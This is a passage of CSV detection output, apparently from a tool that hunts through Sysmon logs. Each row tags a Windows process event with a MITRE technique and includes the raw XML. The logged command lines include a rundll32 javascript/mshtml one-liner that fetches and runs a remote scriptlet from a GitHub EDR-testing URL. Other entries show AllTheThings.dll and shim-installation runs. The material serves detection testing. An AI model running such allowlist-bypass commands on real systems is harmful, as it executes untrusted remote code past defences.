<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:34:10.619</Data>
<Data Name=""ProcessGuid"">747F3D96-6652-5D3F-0000-001058828C00</Data>
<Data Name=""ProcessId"">348</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">rundll32.exe javascript:&quot;\..\mshtml,RunHTMLApplication &quot;;document.write();GetObject(&quot;script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test&quot;)</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-6652-5D3F-0000-0010B9708C00</Data>
<Data Name=""ParentProcessId"">5844</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">cmd /c rundll32.exe javascript:&quot;\..\mshtml,RunHTMLApplication &quot;;document.write();GetObject(&quot;script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test&quot;)</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1564436051.041111,2019-07-30T01:34:11.041111+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe javascript:&quot;\..\mshtml,RunHTMLApplication &quot;;document.write();GetObject(&quot;script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test&quot;) )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:34:10.708142Z"">
</TimeCreated>
<EventRecordID>4971</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:34:10.619</Data>
<Data Name=""ProcessGuid"">747F3D96-6652-5D3F-0000-001058828C00</Data>
<Data Name=""ProcessId"">348</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">rundll32.exe javascript:&quot;\..\mshtml,RunHTMLApplication &quot;;document.write();GetObject(&quot;script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test&quot;)</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-6652-5D3F-0000-0010B9708C00</Data>
<Data Name=""ParentProcessId"">5844</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">cmd /c rundll32.exe javascript:&quot;\..\mshtml,RunHTMLApplication &quot;;document.write();GetObject(&quot;script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test&quot;)</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1085] Rundll32 Execution detected,1564436051.041111,2019-07-30T01:34:11.041111+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe javascript:&quot;\..\mshtml,RunHTMLApplication &quot;;document.write();GetObject(&quot;script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test&quot;) )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:34:10.708142Z"">
</TimeCreated>
<EventRecordID>4971</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:34:10.619</Data>
<Data Name=""ProcessGuid"">747F3D96-6652-5D3F-0000-001058828C00</Data>
<Data Name=""ProcessId"">348</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">rundll32.exe javascript:&quot;\..\mshtml,RunHTMLApplication &quot;;document.write();GetObject(&quot;script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test&quot;)</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-6652-5D3F-0000-0010B9708C00</Data>
<Data Name=""ParentProcessId"">5844</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">cmd /c rundll32.exe javascript:&quot;\..\mshtml,RunHTMLApplication &quot;;document.write();GetObject(&quot;script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test&quot;)</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1564436050.388196,2019-07-30T01:34:10.388196+04:00,,Threat,Low,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c rundll32.exe javascript:&quot;\..\mshtml,RunHTMLApplication &quot;;document.write();GetObject(&quot;script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test&quot;) )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:34:10.373481Z"">
</TimeCreated>
<EventRecordID>4969</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:34:10.292</Data>
<Data Name=""ProcessGuid"">747F3D96-6652-5D3F-0000-0010B9708C00</Data>
<Data Name=""ProcessId"">5844</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cmd /c rundll32.exe javascript:&quot;\..\mshtml,RunHTMLApplication &quot;;document.write();GetObject(&quot;script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test&quot;)</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-6609-5D3F-0000-00109FBF8500</Data>
<Data Name=""ParentProcessId"">1208</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /C &quot;C:\ProgramData\ssh\runtests.bat&quot; </Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1564436050.373481,2019-07-30T01:34:10.373481+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\SysWOW64\rundll32.exe) with commandline ( rundll32 AllTheThings.dll,EntryPoint)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:34:05.542307Z"">
</TimeCreated>
<EventRecordID>4968</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:34:05.526</Data>
<Data Name=""ProcessGuid"">747F3D96-664D-5D3F-0000-0010BB5D8C00</Data>
<Data Name=""ProcessId"">5572</Data>
<Data Name=""Image"">C:\Windows\SysWOW64\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">rundll32 AllTheThings.dll,EntryPoint</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B</Data>
<Data Name=""ParentProcessGuid"">747F3D96-664D-5D3F-0000-00108D5B8C00</Data>
<Data Name=""ParentProcessId"">912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""ParentCommandLine"">rundll32 AllTheThings.dll,EntryPoint</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1564436050.373481,2019-07-30T01:34:10.373481+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\rundll32.exe ) through command line ( rundll32 AllTheThings.dll,EntryPoint )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:34:05.542307Z"">
</TimeCreated>
<EventRecordID>4968</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:34:05.526</Data>
<Data Name=""ProcessGuid"">747F3D96-664D-5D3F-0000-0010BB5D8C00</Data>
<Data Name=""ProcessId"">5572</Data>
<Data Name=""Image"">C:\Windows\SysWOW64\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">rundll32 AllTheThings.dll,EntryPoint</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B</Data>
<Data Name=""ParentProcessGuid"">747F3D96-664D-5D3F-0000-00108D5B8C00</Data>
<Data Name=""ParentProcessId"">912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""ParentCommandLine"">rundll32 AllTheThings.dll,EntryPoint</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1085] Rundll32 Execution detected,1564436050.373481,2019-07-30T01:34:10.373481+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\rundll32.exe ) through command line ( rundll32 AllTheThings.dll,EntryPoint )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:34:05.542307Z"">
</TimeCreated>
<EventRecordID>4968</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:34:05.526</Data>
<Data Name=""ProcessGuid"">747F3D96-664D-5D3F-0000-0010BB5D8C00</Data>
<Data Name=""ProcessId"">5572</Data>
<Data Name=""Image"">C:\Windows\SysWOW64\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">rundll32 AllTheThings.dll,EntryPoint</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B</Data>
<Data Name=""ParentProcessGuid"">747F3D96-664D-5D3F-0000-00108D5B8C00</Data>
<Data Name=""ParentProcessId"">912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""ParentCommandLine"">rundll32 AllTheThings.dll,EntryPoint</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1564436045.542307,2019-07-30T01:34:05.542307+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 AllTheThings.dll,EntryPoint)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:34:05.502592Z"">
</TimeCreated>
<EventRecordID>4967</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:34:05.475</Data>
<Data Name=""ProcessGuid"">747F3D96-664D-5D3F-0000-00108D5B8C00</Data>
<Data Name=""ProcessId"">912</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">rundll32 AllTheThings.dll,EntryPoint</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-664D-5D3F-0000-0010F1498C00</Data>
<Data Name=""ParentProcessId"">6836</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">cmd /c rundll32 AllTheThings.dll,EntryPoint</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1138] Application Shimming - process,1553028767.134377,2019-03-20T00:52:47.134377+04:00,,Threat,High,"[T1138] Application Shimming - process , please check raw log",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-03-19T20:52:47.124363Z"">
</TimeCreated>
<EventRecordID>1966449</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1564"" ThreadID=""1252"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>PC01.example.corp</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-03-19 20:52:47.054</Data>
<Data Name=""ProcessGuid"">365ABB72-569F-5C91-0000-001012610800</Data>
<Data Name=""ProcessId"">2548</Data>
<Data Name=""Image"">C:\Windows\System32\sdbinst.exe</Data>
<Data Name=""FileVersion"">6.0.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Application Compatibility Database Installer</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\sdbinst.exe&quot; -q &quot;C:\Windows\AppPatch\Test.SDB &quot; </Data>
<Data Name=""CurrentDirectory"">C:\Windows\System32\</Data>
<Data Name=""User"">EXAMPLE\user01</Data>
<Data Name=""LogonGuid"">365ABB72-5417-5C91-0000-002035340300</Data>
<Data Name=""LogonId"">0x33435</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F</Data>
<Data Name=""ParentProcessGuid"">365ABB72-551C-5C91-0000-001030590500</Data>
<Data Name=""ParentProcessId"">2704</Data>
<Data Name=""ParentImage"">C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe&quot; </Data>
</EventData>
</Event>",PC01.example.corp,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1564436045.542307,2019-07-30T01:34:05.542307+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 AllTheThings.dll,EntryPoint )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:34:05.502592Z"">
</TimeCreated>
<EventRecordID>4967</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:34:05.475</Data>
<Data Name=""ProcessGuid"">747F3D96-664D-5D3F-0000-00108D5B8C00</Data>
<Data Name=""ProcessId"">912</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">rundll32 AllTheThings.dll,EntryPoint</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-664D-5D3F-0000-0010F1498C00</Data>
<Data Name=""ParentProcessId"">6836</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">cmd /c rundll32 AllTheThings.dll,EntryPoint</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1085] Rundll32 Execution detected,1564436045.542307,2019-07-30T01:34:05.542307+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 AllTheThings.dll,EntryPoint )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:34:05.502592Z"">
</TimeCreated>
<EventRecordID>4967</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:34:05.475</Data>
<Data Name=""ProcessGuid"">747F3D96-664D-5D3F-0000-00108D5B8C00</Data>
<Data Name=""ProcessId"">912</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">rundll32 AllTheThings.dll,EntryPoint</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
